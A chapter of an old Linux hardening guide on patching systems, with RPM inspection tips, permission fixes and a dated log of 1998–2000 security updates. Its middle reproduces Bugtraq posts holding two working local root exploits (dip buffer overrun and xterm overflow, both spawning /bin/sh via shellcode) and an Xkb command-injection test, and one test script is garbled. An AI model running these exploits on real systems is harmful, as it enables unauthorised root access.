Next Previous Contents

52. Thoughts about the needs and procedures to Patching your Linux distribution

All users should apply patches to their respective Linux installation:

1. upon the first time the machine is installed

2. at least every week after that to stay ontop of the newest bug and security fixes

To find out what are the current security issues with Linux, etc, check out the Security URLs in Section 5

--- --- ---

NOTE: This is where Redhat RPMs, and Debian upgrade files really shine and blow away Slackware .PKG files!

NOTE #2: Be careful of where you download your newer versions of source code, RPMs, etc. Recently, ftp://win.tue.nl was hacked and the hackers put trojan'ed versions of TCP-wrappers and Linux-utils on their site. Because of this, many user's passwords were sent to the hacker's email address, etc. Not good.

In the future, I will cover how to verify the package's authenticity with PGP.

Redhat users: Depending on when you purchased your CD, your CD might already have these RPMs installed so if it says the RPM is already installed, just skip it.

************************* ** Be cautious with RPMs ** Before you blindly start installing new patch RPMs or even new software in RPM form, you really should (quickly) inspect the RPM archive to make sure it looks ok. For example, lets say you are going to install a new Sendmail RPM:

First, download the new Sendmail RPM file and put it to some location for future reference. I personally put all files in /usr/src/archive as described in the top of Section 5

Now show the RPM creator's notes:


                                rpm -qip sendmail-*.i386.rpm 

Show the RPM's file contents:


                                rpm -qlp sendmail-*.i386.rpm | more

- Next, if you already have an older Sendmail RPM installed, make sure that the new RPMs won't clober your old configuration files:


                                rpm -Uv --test sendmail-*.i386.rpm 

For even more info (I'd recommend it), do:


                                rpm -Uvv --test sendmail-*.i386.rpm 

- With a little cautious looking, you'll know what will happen if you install this new RPM. Ok?

If the new Sendmail installation is going to copy over your original files, the RPM will -usually- make a backup of your configuration files and add a ".rpmsave" to it.

*** ******************************

Redhat users #2: I have noticed that the "rpm" program will crash (coredump) about 60% of the way through a wildcard (*.rpm) RPM upgrade process. You should be able to safely figure out what patches it failed to install and do them manually or by doing the following:

Say that the RPM program died while doing patching in the letter range (Q). So, do this to install all patches from Q to Z.


                                        "rpm -Uvh [q-zQ-Z].rpm

************************ ** Patching your Redhat system ** Now, to find out if any new RPM files exist for Redhat, go to http://www.redhat.com/support/docs/errata.html and then look at the upper right-hand corner's date. If this date is NEWER than the 00readme.errata file, then there are newer RPMs.

Their documentation system read SUCKS in terms of though there might be a NEWER RPM for Glibc, they mearly update the DATE in the previous Gblic errata entry. Lame eh? So, you will have to page though the different errata listing to find what newer-date entries have been added.

*** ******************************

---- Various RPMs, permission fixes, etc...

- Fix BRU if it is installed:


                chmod 1777 /usr/local/lib/bru   (assuming root login)


                        or

                My /usr/local/lib/bru directory is 775, works fine (as expected) from root.


                great Security URLS:

                        ftp://ftp.win.tue.nl/pub/security
                
        
        sendmail:       8.8.6.1

                KSR[T] Advisory #003
                Date:   Aug 05, 1997
                ID #:   lin-cron-003

                Operating System(s): Redhat linux 4.1, SuSE Linux 5.0, Slackware 3.3

                Affected Program:    updatedb / crontabs

                Syn Attack logs:
                http://www.whitefang.com/synlog.html

                IP filtering:
                ftp://ietf.org/internet-drafts/draft-ferguson-ingress-filtering-03.txt


                CRON exploit:
                ftp://ftp.freesoftware.com/pub/linux/slackware-3.4/slakware/a2/bin.tgz

                psaux:
                        The Quick fix:      chmod 660 /dev/psaux


        2/9/98: Xkb

                1. as usual chmod u-s,g-s all installed Xserver binaries (*)
                Quick vulnerability check

                        $ Xserver -xkbdir ':;id > /tmp/I_WAS_HERE;'
                        [exit X server]
                        $ grep root /tmp/I_WAS_HERE && echo 'Gotcha!'

                * remove setuid/setgid bit from all installed Xservers
                * use xdm or a safe setuid wrapper to start Xserver

        2/9/98: Device Dos
                ls -l /dev/* | grep "r-- "
                chmod ;)

        2/9/98: Upgrade to ld.so v1.9.5 or better..

        2/9/98: The patch corrects the coredump error in both imapd and ipop3d (the pine
                version of pop3 server). Patch is against pine 3.96

                diff -ru log_lnx.c.orig
                log_lnx.c
                --- log_lnx.c.orig      Tue May  2 00:08:20 1995
                +++ log_lnx.c   Thu Feb  5 08:49:31 1998
                @@ -55,7 +55,8 @@
                                /* allow case-independent match */
                   if (!pw) pw = getpwnam (lcase (strcpy (tmp,user)));
                                /* no entry for this user or root */
                -  if (!(pw && pw->pw_uid)) return NIL;
                +  if (!(pw)) return NIL;
                +  if (!(pw->pw_uid)) return NIL;
                   if(!(spw = getspnam (pw->pw_name))) return NIL;
                                /* validate password */
                   if (strcmp (spw->sp_pwdp,(char *) pw_encrypt(pass,spw->sp_pwdp))) return NIL;


        2/9/98  chmod 700 /dev/zero
                Date:   Fri, 6 Feb 1998 07:59:46 +0100

        2/9/98  Xconfigurator issue (if installed)

                        chmod 700 Xconfigurator

                Date:   Fri, 6 Feb 1998 07:59:46 +0100

        2/9/98 Remove all old versions of /lib/libc.so.x

        2/9/98 Upgrade linux-ld.so.x

        4/6/98  Security 

                "chmod 700" the following files:

                /tmp overwrite exploit

                /sbin/Liloconfig (already good permissions)
                /sbin/pkgtool.tty and /usr/lib/setup.cpkgtool (fixed)
                /sbin/makebootdisk (fixed)
                /sbin/netconfig.tty and netconfig.color (fixed)




        4/19/98:

                Here is a patch for the "Off by one IP header bug.  Put the following into
                a file (ie: offbyone.patch) in /usr/src/linux and apply it by running 
                "patch -p1 < offbyone.patch".

                [This is FIXED in 2.0.35]

                --<begin>--

                --- ip_fragment.c.old   Thu Apr 16 12:25:34 1998
                +++ ip_fragment.c       Thu Apr 16 12:29:02 1998
                @@ -375,7 +375,7 @@
                        fp = qp->fragments;
                        while(fp != NULL)
                        {
                -               if (fp->len < 0 || count+fp->len > skb->len)
                +               if (fp->len < 0 || fp->offset+qp->ihlen+fp->len > skb->len)
                                {
                                        NETDEBUG(printk("Invalid fragment list: Fragment over size.\n"));
                                        ip_free(qp);

                --<end>--

                Now, re-compile the kernel, move the kernel to /boot, update the /etc/lilo.conf
                file, re-run "lilo", and reboot.

        4/22/98:

                [linux-security] SECURITY: procps 1.2.7 fixes security hole

        5/8/98:

                Dip and Xterm exploits:

                  The following code causes a buffer overrun in dip-3.3.7o that
                comes with linux slakware version 3.4  and maybe others.

                It can give you root permission if dip file is owned by root and
                set-user-id bit is set.

                  This problem was mentioned in this list some days ago by Goran Gajic,
                and he has also posted some possible ways to correct it.

                  The code is too messy... but it works.

                Regards,

                zef


                ------------------------------ dipr.c -----------------------------

                /*
                 * dip-3.3.7o buffer overrun                            07 May 1998
                 *
                 * sintax: ./dipr <offset>
                 *
                 *
                 *   offset: try increments of 50 between 1500 and 3000
                 *
                 *   tested in linux with dip version 3.3.7o (slak 3.4).
                 *
                 *                by zef and r00t @promisc.net
                 *
                 *                   http://www.promisc.net
                 */

                #include <stdio.h>
                #include <stdlib.h>
                
                static inline getesp()
                {
                  __asm__(" movl %esp,%eax ");
                }

                main(int argc, char **argv)
                {
                  int jump,i,n;
                  unsigned long xaddr;
                  char *cmd[5], buf[4096];


                char code[] =
                  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
                  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
                  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

                  jump=atoi(argv[1]);

                  for (i=0;i<68;i++)
                    buf[i]=0x41;

                  for (n=0,i=68;i<113;i++)
                    buf[i]=code[n++];

                  xaddr=getesp()+jump;

                  buf[i]=xaddr & 0xff;
                  buf[i+1]=(xaddr >> 8) & 0xff;
                  buf[i+2]=(xaddr >> 16) & 0xff;
                  buf[i+3]=(xaddr >> 24) & 0xff;

                  buf[i+4]=xaddr & 0xff;
                  buf[i+5]=(xaddr >> 8) & 0xff;
                  buf[i+6]=(xaddr >> 16) & 0xff;
                  buf[i+6]=(xaddr >> 16) & 0xff;
                  buf[i+7]=(xaddr >> 24) & 0xff;

                  cmd[0]=malloc(17);
                  strcpy(cmd[0],"/sbin/dip-3.3.7o");

                  cmd[1]=malloc(3);
                  strcpy(cmd[1],"-k");

                  cmd[2]=malloc(3);
                  strcpy(cmd[2],"-l");

                  cmd[3]=buf;

                  cmd[4]=NULL;

                  execve(cmd[0],cmd,NULL);
                }

                ------------------------------- end -------------------------------


                Shell script for easy testing :-)


                ---------------------------- dipr.test ----------------------------
        
                #/bin/bash
                if [ ! -x /sbin/dip-3.3.7o ]
                then
                  echo "could not find file \"/sbin/dip-3.3.7o\"";
                  exit -1
                fi
                if [ ! -u /sbin/dip-3.3.7o ]
                then
                  echo "dip executable is not suid"
                  exit -1
                fi
                if [ ! -x ./dipr ]
                then
                  echo "could not find file \"./dipr\"";
                  echo "try compiling dipr.c"
                  exit -1
                fi

                x=2000
                false
                while [ $x -lt 3000 -a $? -ne 0 ]
                fi
                if [ ! -u /sbin/dip-3.3.7o ]
                then
                  echo "dip executable is not suid"
                  exit -1
                fi
                if [ ! -x ./dipr ]
                then
                  echo "could not find file \"./dipr\"";
                  echo "try compiling dipr.c"
                  exit -1
                fi

                x=2000
                false
                while [ $x -lt 3000 -a $? -ne 0 ]
                do
                  echo offset=$x
                  x=$[x+50]
                  ./dipr $x
                done
                rm -f core

                ------------------------------- end -------------------------------


                Approved-By: aleph1@NATIONWIDE.NET
                X-Sender: andrea@dragon.bogus
                X-Public-Key-URL: http://www-linux.deis.unibo.it/~mirror/aa.asc
                Date:   Fri, 8 May 1998 16:50:05 +0200
                Reply-To: Andrea Arcangeli <arcangeli@MBOX.QUEEN.IT>
                Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
                From: Andrea Arcangeli <arcangeli@MBOX.QUEEN.IT>
                Subject:      xterm exploit [TOG issue]
                To: BUGTRAQ@NETSPACE.ORG

                /*
        
                  xterm_exp.c : linux/x86 xterm.Xaw exploit
                  by alcuin - 5/4/98 - [ http://www.rootshell.com/ ]
        
                  It works against both Xaw and neXtaw widgets
        
                  NB: you have to cp ~/.Xdefaults.old ~/.Xdefaults to be able to
                  use xterm again.

                */

                #include <stdlib.h>
                #include <stdio.h>
                #include <ctype.h>
        

                unsigned int getsp() {
                  asm("mov %esp,%eax");
                }

                inline rootshell(){
                  __asm__(
                      "movb $0x56, %al\n\t"
                      "l1:cmpb $0x12, %al\n\t"
                      "je l2\n\t"
                      "movb $0x12,%al\n\t"
                      "call l1\n\t"
                      "l2:pop %esi\n\t"
                      "xorl %eax,%eax\n\t"
                      "movb $0x25, %al\n\t"
                      "addl %eax,%esi\n\t"
                      "movl %esi,%ebx\n\t"
                      "movl %esi,%edi\n\t"
                      "movb $8,%al\n\t"
                      "addl %eax,%edi\n\t"
                      "movb $5,%al\n\t"
                      "addl %eax,%esi\n\t"
                      "movl %esi,(%edi)\n\t"
                      "movl %edi,%ecx\n\t"
                      "incl %edi\n\t"
                      "incl %edi\n\t"
                      "incl %edi\n\t"
                      "incl %edi\n\t"
                      "xorb %al,%al\n\t"
                      "movl %eax,(%edi)\n\t"
                      "movl %edi,%edx\n\t"
                      "movb $0xb,%al\n\t"
                      "int $0x80\n\t"
                      ".string \"/bin/sh\"\n"
                      );
                }


                #define CONFFILE ".Xdefaults"
                #define OLDFILE ".Xdefaults.old"
                #define NEWFILE ".Xdefaults.new"
                
                main (int argc, char **argv) {

                  char *home;
                  FILE *f_in, *f_out;
                  char buf[16384];
                  char shellbuf[16384];
                  char *s;
                  int i;
                  unsigned int sp=getsp();
        
                  if (home = getenv("HOME")) chdir(home);
        
                  if (!(f_out = fopen(NEWFILE, "w"))) {
                    perror("fopen");
                    exit(1);
                  }

                  if (f_in = fopen(CONFFILE, "r")) {
                    fseek(f_in,0,SEEK_SET);
                    while (!feof(f_in)) {
                      fgets(buf,16384,f_in);
                      for (s=buf;isblank(*s);s++);
                      if (strncmp(s,"xterm*inputMethod",17)<0)
                        fputs(buf,f_out);
                    }
                    fclose(f_in);
                  }

                  /* fill the buffer with nops */
                  memset(shellbuf, 0x90, sizeof(shellbuf));
                  shellbuf[sizeof(shellbuf)-1] = 0;

                  /* write the return adress */
                  s = shellbuf+2052;
                  *(int *)s=sp+0x69F5;

                  /* write the root shell code */
                  s = shellbuf+2800;
                  strcpy(s,(char*)rootshell);

                  fputs("xterm*inputMethod:",f_out);
                  fputs(shellbuf, f_out);
                  fclose(f_out);

                  system("/bin/cp "CONFFILE" "OLDFILE);
                  system("/bin/mv -f "NEWFILE" "CONFFILE);
        
                  execl("/usr/X11R6/bin/xterm","xterm",NULL);
                }

                I can' t reproduce the problem with the latest Debian compiled XFree86:

                andrea@dragon:~$ dpkg -l xbase
                Desired=Unknown/Install/Remove/Purge
                | Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed
                |/ Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err: uppercase=bad)
                ||/ Name            Version        Description
                +++-===============-==============-============================================
                ii  xbase           3.3.2-4        local clients and configuration required by
        
                Andrea[s] Arcangeli

        ----


=======================================================================
        See the updated master RPM guide at the TOP of this section
=======================================================================


Applied the following patches on 5/30/98:

                rpm -Uvh --force --nodeps rpm-2.5.1-1.i386.rpm 
                rpm -Uvh glibc-2.0.7-13.i386.rpm 
                rpm -Uvh glibc-devel-2.0.7-13.i386.rpm

Applied the following on 6/1/98 to fix the --nodep issue:

                rpm -Uvh patch-2.5.2.i386.rpm


6/13/98 - SSH 1.2.25 update.  There is a new SSH exploit that requires
                that users upgrade to 1.2.25 ASAP!!!!   See the SSH chapter,
                section 29, for URLs.

6/15/98 - installed bootp, metamail, dhcpcd, minicom, dhcp, xscreensaver,
          findutils, X11, mailx RPMS

6/20/98 - Changed permissions of /usr/bin/lpr to (chmod 700 /usr/bin/lpr) due
                to some security issues.

7/1/98  - Changed the permissions of /usr/X11R6/bin/seyon to (chmod 700) due
                to security issues

7/4/09  - implemented the new RPMs for:
                        slang
                        libtermcap
                        rpm 

            I *SKIPPED* the Tin upgrade since I installed Tin v1.4beta.
            I *SKIPPED* the Bind v4.9.x upgrade since I'm running Bind 8.1.2T3

7/8/98  - implemented the new dosemu-0.66.7-7.i386.rpm and libtermcap-2.0.8-9.i386.rpm
                fixes.

7/13/98 - implemented the new samba-1.9.18p7-2.i386.rpm RPM due to security issues

7/14/98 - Just after Pine 4.00 was released, we were made aware of a security
                problem with the imapd server that is included in the Pine 4.00
                distribution. This will be fixed in the Pine 4.01 maintenance release, but
                in the mean time, if you are using the UW IMAP server, please update it
                with the following distribution:

                   ftp://ftp.cac.washington.edu/mail/imap.tar.Z

                We don't have new imapd binaries available yet.
                Pine itself is not affected.

7/28/98 - implemented the following RPMs:

                NOTE:  Upon installation of the initscripts RPM, you will need to
                         re-do ALL network optimizations from [Section 16]


                        + ncurses-1.9.9e-9.i386.rpm
                        + ncurses-devel-1.9.9e-9.i386.rpm
                        + imap-4.1.final-1.i386.rpm
                                (installed the RPM though TrinityOS disables IMAP)
                        + elm-2.4.25-14.i386.rpm
                        + glibc-2.0.7-19.i386.rpm
                        + glibc-debug-2.0.7-19.i386.rpm
                + glibc-devel-2.0.7-19.i386.rpm
                        + glibc-profile-2.0.7-19.i386.rpm               
                        + Xconfigurator-3.26.1-1.i386.rpm
                        + initscripts-3.67-1.i386.rpm

                                This RPM changes the following files but it makes backups
                                of your old files:

                                        /etc/ppp/ip-up 
                                        /etc/rc.d/rc.sysinit 
                                        /sbin/ifup 

                        + modutils-2.1.85-4.i386.rpm
                        + findutils-4.1-24.i386.rpm
        
                - Removed SUID bit from the /usr/bin/dumpreg program due to a
                  kernel crash issue

                        chmod 755 /usr/bin/dumpreg

8/8/98  - implemented the following RPMs:

                        + mutt-0.91.1-5.i386.rpm 
                        + SysVinit-2.74-4.i386.rpm      
                        
8/11/98 - implemented the apache-1.2.6-5.i386.rpm RPM

                        NOTE:  If you are NOT using apache yet but still installed the
                                 RPM, you will start getting Log Rotate errors.  To fix this,
                                 do the following:

                                        mkdir /etc/logrotate.d.disabled
                                        mv /etc/logrotate.d/apache /etc/logrotate.d.disabled/apache

8/17/98 - implemented the svgalib-1.2.13-5.i386.rpm to fix a console DoS.

8/22/98 - implemented the LinuxConf linuxconf-1.11r19-1.i386.rpm
                        RPM to fix a /tmp DoS hack for Redhat 5.1+ distributions

8/28/98 - implemented the nfs-server-2.2beta29-7.i386.rpm and
                  nfs-server-clients-2.2beta29-7.i386.rpm patches to fix NFS (again..)

8/31/98 - There is a buffer overflow DoS attack on Minicom, to fix this,
                  run "chmod 700 /usr/sbin/minicom"

9/20/98 - Installed the xscreensaver-2.27-1.i386.rpm to fix core dumps 
                        with xlyap

10/10/98        - De-installed the following tools:

                                rpm -e fstool usercfg cabaret

                        I have also installed several other RPMs from Redhat's
                        update page.  Please follow 

10/31/98        - Installed 

                5.0 RPMS
                        + bash-1.14.7-11.i386.rpm                
                        + imap-4.1.final-1.i386.rpm
                        + netscape-navigator-4.06-2.i386.rpm                    
                        + nfs-server-2.2beta29-7.i386.rpm
                        + nfs-server-clients-2.2beta29-7.i386.rpm
                        + pcmcia-cs-2.9.12-3.i386.rpm            
                        + rpm-2.5.3-5.0.i386.rpm                 
                        + rpm-devel-2.5.3-5.0.i386.rpm            
                        + xscreensaver-2.27-1.i386.rpm         
  

                5.1 RPMs
                        + fetchmail-4.5.3-1.i386.rpm             
                        + glint-2.6.1-1.i386.rpm                 
                        + ispell-3.1.20-9.i386.rpm               
                        + man-1.5d-3.i386.rpm                     
                        + xosview-1.5.1-4.i386.rpm                

11/05/98        - Installed

                        + svgalib-1.2.13-6.i386.rpm
                        + svgalib-devel-1.2.13-6.i386.rpm
                        + zgv-3.0-0.5.0.i386.rpm

11/13/98        - Installed

                        + libc-5.3.12-28.i386.rpm

11/15/98        - Installed:

                        + sysklogd-1.3-26.i386.rpm
                        + samba-1.9.18p10-5.i386.rpm

12/01/98        - Disabled RZ and SZ due to the fact that LRZ creates files
                        of 0666 though the UMASK might be different.

                        chmod 700 /usr/bin/lrz
                        chmod 700 /usr/bin/lsz

12/17/98        - Added updated RPMs for issues with Netscape, FTP, Xwindows

                        netscape-common-4.08-1.i386.rpm
                        netscape-communicator-4.08-1.i386.rpm
                        netscape-navigator-4.08-1.i386.rpm

                        ftp-0.10-4.i386.rpm

                        XFree86-libs-3.3.3-1.i386.rpm
                        XFree86-3.3.3-1.i386.rpm

12/29/98        - Added 1 RPM

                        pam-0.64-4.i386.rpm

02/10/99        - Added 1 RPM to fix a root-compromise FTP bug

                        ftp://updates.redhat.com/5.2/i386/wu-ftpd-2.4.2b18-2.1.i386.rpm

                   NOTE:  Though not included with Slackware or Redhat, ProFTPd which
                                comes with Debian Linux is vulnerable too.  Upgrade to
                                version 1.2.0pre1-2 or better.


02/11/99        - There is a Lynx /tmp race and ALL versions of Lynx less than v2.8.1
                  are vulnerable.  Until you update your Lynx code, DISABLE it:

                        chmod 700 /usr/bin/lynx

02/15/99        - The "Super" program, similar to "su" on Debian Linux has a root
                  exploit.   Upgrate to at least v3.11.7.
                        ftp.onshore.com:/pub/mirror/software/super
                
02/17/99        - There is a root exploit against /usr/sbin/lsof.  Change its
                        permissions to 0755

02/19/99        - Installed the lsof-4.40-1.i386.rpm to fix the security
                  issue announced on 2/17/99

                - Debian has released the super_3.11.7-1.deb patch to fix the security
                  issues announced on 02/15/99

02/21/99        - Zgv has another exploit.  Because of this, I recommend to make it
                  only root executable:

                        chmod 0500 /usr/bin/zgv

03/05/99        - There is a root exploit for GNUplot on SuSe distributions.  For some
                  reason, SuSe installed this program SUID root.  Fix this:

                        chmod 755 /usr/bin/gnuplot

03/20/99        - There is a security vunderability in Netscape 4.5.0's "talkback".
                  Netscape 4.51 has removed talkback .

                  Change its permissions via "/bin/chmod -R 600 /opt/netscape/talkback"

03/20/99        - There is a SuSE security issue with /proc/kmem

                  Change its permissions "/bin/chmod 640 /dev/kmem"


03/28/99        - There is a /tmp race condition that can overwrite files.
                  Until there is a new Xfree version posted, do the following:

                        /bin/rm -rf /tmp/.X11-unix
                        mkdir -p -m 1777 /tmp/.X11-unix


03/30/99        - There are are (4) new patches for Redhat but (2) of them are
                  dependant on the version of Redhat.  

                        mutt-0.95.4us-0.i386.rpm
                        pine-3.96-7.1.i386.rpm
                        sysklogd-1.3.31-0.5.i386.rpm
                        zgv-3.0-1.5.0.i386.rpm

                NOTE:  There is a small bug with the sysklogd rpm.  Please see ChangeLog
                         date 4/12/99 for more details.

04/19/99        - Installed (3) new RPMs for security reasons:

                        lpr-0.35-0.5.2.i386.rpm
                        procmail-3.13.1-1.i386.rpm
                        rsync-2.3.1-0.i386.rpm

05/03/99        - Older versions of Caldera might make the /etc/shadow file world readable.
                  Update your Coas tool to coas-1.0-8.i386.rpm

05/05/99        - There is a new Bugtraq exploit for Wu-FTP v2.4.2-Beta18 and below called "W00f".
                  Redhat hasn't released a new wu-ftp version so you'll need to install it yourself!

                        ftp://ftp.vr.net/pub/wu-ftpd/binaries/intel/linux/wu-ftpd-2.4.2-vr17-1.i386.rpm

06/1/99 - There is a Y2K issue with Timetool:

                        ftp://updates.redhat.com/5.2/noarch/timetool-2.5-4.noarch.rpm

                - There is a problem with the newest Apache module for Perl CGIs

                        ftp://updates.redhat.com/5.2/i386/mod_perl-1.19-1.i386.rpm

6/04/99 - Redhat has updated their kernels in RH6.0 for a DoS issue.

                        ftp://updates.redhat.com/6.0/i386/kernel-2.2.5-22.i386.rpm

6/12/99 - Redhat has a new patch for RH6 to monitor stray processes

                        ftp://updates.redhat.com/6.0/i386/utempter-0.5-2.i386.rpm

                - More fixes for the POP-3 protocol:

                        ftp://updates.redhat.com/5.2/i386/imap-4.5-0.5.2.i386.rpm


6/18/99 - Redhat released some patches for security issues with some 
                  terminal progs on RH6.

                        dev-2.7.7-2.i386.rpm
                        rxvt-2.6.0-2.i386.rpm
                        screen-3.7.6-9.i386.rpm

                - Redhat also has updated their entire Xwindow package for problem
                  fixes for the font server, race conditions, ISO-8859 char conflicts,
                  No Xauth authentication (ack!), and backspace keymapping issues:

                        XFree86-3.3.3.1-52.i386.rpm, XFree86-100dpi-fonts-3.3.3.1-52.i386.rpm
                        XFree86-75dpi-fonts-3.3.3.1-52.i386.rpm, XFree86-3DLabs-3.3.3.1-52.i386.rpm
                        XFree86-8514-3.3.3.1-52.i386.rpm, XFree86-AGX-3.3.3.1-52.i386.rpm
                        XFree86-FBDev-3.3.3.1-52.i386.rpm, XFree86-I128-3.3.3.1-52.i386.rpm
                        XFree86-Mach32-3.3.3.1-52.i386.rpm, XFree86-Mach64-3.3.3.1-52.i386.rpm
                        XFree86-Mach8-3.3.3.1-52.i386.rpm, XFree86-Mono-3.3.3.1-52.i386.rpm
                        XFree86-P9000-3.3.3.1-52.i386.rpm, XFree86-S3-3.3.3.1-52.i386.rpm
                        XFree86-S3V-3.3.3.1-52.i386.rpm, XFree86-SVGA-3.3.3.1-52.i386.rpm
                        XFree86-VGA16-3.3.3.1-52.i386.rpm, XFree86-W32-3.3.3.1-52.i386.rpm
                        XFree86-XF86Setup-3.3.3.1-52.i386.rpm, XFree86-Xnest-3.3.3.1-52.i386.rpm
                        XFree86-Xvfb-3.3.3.1-52.i386.rpm, XFree86-cyrillic-fonts-3.3.3.1-52.i386.rpm
                        XFree86-devel-3.3.3.1-52.i386.rpm, XFree86-doc-3.3.3.1-52.i386.rpm
                        XFree86-libs-3.3.3.1-52.i386.rpm, XFree86-xfs-3.3.3.1-52.i386.rpm


6/23/99 - Redhat has released a new patch set for KDE on RH6 to bring it to 
                release levels and it also fixes some security issues:

                Intel: ftp://updates.redhat.com/6.0/i386/

                kdeadmin-1.1.1-1.i386.rpm, kdebase-1.1.1-1.i386.rpm, kdegames-1.1.1-1.i386.rpm
                kdegraphics-1.1.1-1.i386.rpm, kdelibs-1.1.1-1.i386.rpm, kdemultimedia-1.1.1-1.i386.rpm
                kdenetwork-1.1.1-1.i386.rpm, kdesupport-1.1.1-1.i386.rpm, kdetoys-1.1.1-1.i386.rpm
                kdeutils-1.1.1-1.i386.rpm, korganizer-1.1.1.i386.rpm


                - Redhat has release new PHP modules for the Apache WWW server:

                Intel: ftp://updates.redhat.com/6.0/i386/

                mod_php3-3.0.9-1.i386.rpm, mod_php3-imap-3.0.9-1.i386.rpm, mod_php3-manual-3.0.9-1.i386.rpm
                mod_php3-pgsql-3.0.9-1.i386.rpm


6/24/99 Redhat has released a new set of NFS server and client fixes.

                        nfs-server-2.2beta44.i386.rpm, nfs-server-clients2.2beta44.i386.rpm


                Redhat has released a new nettools patch to fix security issues:

                        ftp://updates.redhat.com/6.0/i386/net-tools-1.52-2.i386.rpm


                Redhat has released a new version of Talk to fix issues that they broke in RH6

                        ftp://updates.redhat.com/6.0/i386/talk-0.11-2.i386.rpm


Ack!  This is a huge gap eh?

11/15/99        - There is a ROOT exploit against ALL versions of NAMED less than
                        8.2.2p5.  Upgrade your BIND DNS server NOW!

11/19/99        - Added a Buffer overflow fix for NFS
                    nfs-server-2.2beta47-1.i386.rpm
                nfs-server-clients-2.2beta47-1.i386.rpm 

                - Denial of service attack in syslogd
                  sysklogd-1.3.31-1.5.i386.rpm

12/09/99        - Debian reports a root overflow in htdig which is installed in v2.1 of the
                  distribution.  

01/17/00        - Added (4) RPMs for security

                        Redhat 6.x:     pam-0.68-10.i386.rpm
                                        sharutils-4.2.1-1.6.1.i386.rpm
                                        usermode-1.18-1.i386.rpm

                        All Redhat:     lpr-0.48-0.5.2.i386.rpm


Next Previous Contents